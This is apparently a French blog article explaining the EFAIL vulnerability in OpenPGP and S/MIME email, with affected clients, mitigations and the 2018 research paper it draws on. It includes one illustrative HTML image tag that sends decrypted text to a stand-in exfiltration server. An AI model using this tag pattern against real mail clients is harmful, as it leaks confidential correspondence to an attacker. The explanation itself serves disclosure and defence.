Une équipe européenne de spécialistes de la sécurité a découvert une vulnérabilité critique, directement ou indirectement liée aux standards OpenPGP et S/MIME. Ils l’ont nommée EFAIL.
OpenPGP et S/MIME sont deux standards dont le but est l’échange de courriels chiffrés, afin d’assurer la confidentialité des correspondances.
On notera que dans la plupart des cas aujourd’hui, les courriels sont chiffrés automatiquement en transit par TLS, mais les courriels sont stockés dans les serveurs en clair. Avec OpenPGP et S/MIME, ils sont chiffrés même dans les serveurs.
La faille de sécurité résulte en l’exfiltration du courriel vers des serveurs malveillants, quand les courriels sont traités par un client de messagerie.
Elle n’est exploitable que quand le courriel est au format HTML. Dans ce format, il est possible de lier des objets externes dans des courriels, comme des photos, des images, des vidéos, des styles, etc.
La faille consiste alors à exfiltrer des informations dans le tag HTML qui sera envoyé au serveur web pour récupérer l’objet :
< IMG src = "http://www.serveurdexfiltration.com Rendez-vous secret demain à 9 heures ">
Les auteurs de l’étude énoncent deux cas : exfiltration directe et indirecte.
L’exfiltration directe est l’exploitation de vulnérabilités dans Apple Mail, iOS Mail et Mozilla Thunderbird. De notre point de vue, cela n’est pas à mettre sur le compte de EFAIL, mais sur d’autres vulnérabilités.
L’exploitation indirecte de la vulnérabilité nécessite des moyens qui ne sont pas à la portée du premier venu, puisque l’attaquant doit déjà avoir accès à un courriel chiffré par OpenPGP ou S/MIME : accès direct à l’ordinateur de la victime – et dans ce cas cette dernière a bien d’autres soucis à se faire -, compromission du serveur de courriels, des sauvegardes, des comptes de courriels, espionnage du trafic réseau, et encore une fois, la plupart du trafic de courriels est aujourd’hui chiffré.
En d’autres termes, une telle attaque est à la portée de la NSA, de services de renseignements, mais pas du pirate du quartier, ce qui limite fortement la portée de la vulnérabilité.
À l’exception des clients de messagerie d’Apple, de Thunderbird/Enigmail, la plupart des clients de messagerie, dont Outlook à partir de la version 2010, ne sont pas affectées par les attaques PGP:
La plupart des clients de messagerie sont affectés par les attaques sur S/MIME, mais elles nécessitent l’interaction de l’utilisateur dans le cas d’Outlook 2013 et 2016.
Dans l’immédiat, les personnes exploitant soit PGP soit S/MIME peuvent se protéger en :
– Utilisant OpenPGP et un client de messagerie non vulnérable, comme Outlook 2010 et ultérieur ;
– Ou en désactivant le rendu HTML dans le client de messagerie, ou :
– Ou en ne déchiffrant pas les courriels dans le client de messagerie, mais en copiant leur contenu et en utiliser une application séparée pour le déchiffrement ;
À plus long terme, des mises à jour seront certainement développées par les éditeurs de clients de messagerie pour contrer EFAIL ou rendre son exploitation encore plus difficile.
On notera qu’il existe une alternative fiable : ne pas utiliser les courriels pour les correspondances confidentielles, et leur préférer l’utilisation d’un client de messagerie mobile chiffré, tel que Signal, Telegram, voire WhatsApp.
Si l’on se félicite du travail des chercheurs européens, et de la divulgation responsable de la vulnérabilité auprès des entreprises concernées, en secret, dès novembre, on retiendra que son exploitation nécessite des moyens considérables. L’effet dramatique d’annonce, un jour avant, ne nous semblait pas justifié.
Enfin, on peut considérer qu’il ne s’agit pas d’une vulnérabilité d’OpenPGP ou de S/MIME, mais d’une vulnérabilité affectant la façon dont ils interagissent avec les clients de messagerie modernes.
Le lecteur souhaitant connaître tous les détails techniques de la vulnérabilité peut lire l’article de recherche complet, en anglais :
Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels [v0.9 Draft] [PDF]
Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, and Jörg Schwenk.
27th USENIX Security Symposium, Baltimore, August 2018.